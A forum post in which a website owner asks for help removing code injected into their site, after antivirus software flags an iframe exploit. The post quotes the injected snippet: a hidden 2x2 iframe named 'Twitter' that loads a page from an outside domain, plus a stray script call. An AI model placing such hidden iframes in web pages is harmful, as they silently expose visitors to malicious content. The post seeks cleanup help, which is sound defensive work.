I appear to have an rogue piece of code that has somehow inserted itself into my current website design and I am unable to find where it would be hiding. Whenever I view the page in a browser my security software comes up with this warning

Exploit:HTML/IframeRef.DM

The AV software cleans it from the cache but as soon as I reload the page of course it is back again

I have tried to back track as to where it would have first appeared and all I can think of is when I tried to include a FormSite form into a placeholder on my home page - but this is a wild guess. I have deleted the placeholder for this and as far as I know the associated <iframe> placeholder also.

The images I am using on the site are a combination of in house photos and some that I have purchased from 123RF which I would expect would be free of malicious code.

I also played with the Facebook wideget to but have since deleted it as well.

So far I have trawled the page for possible locations but no luck.

Looking at the source code of the page I find at the very bottom of all the code..

<!--[if lt IE 7]><script type="text/javascript" src="index_htm_files/png.js"></script><![endif]-->
<script type="text/javascript">xr_aeh()</script>
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?i=1353323></iframe></body>
</html>

Where is this hiding?

Anyone have any experience with how I would go about finding what this code has attached itself to?

Cheers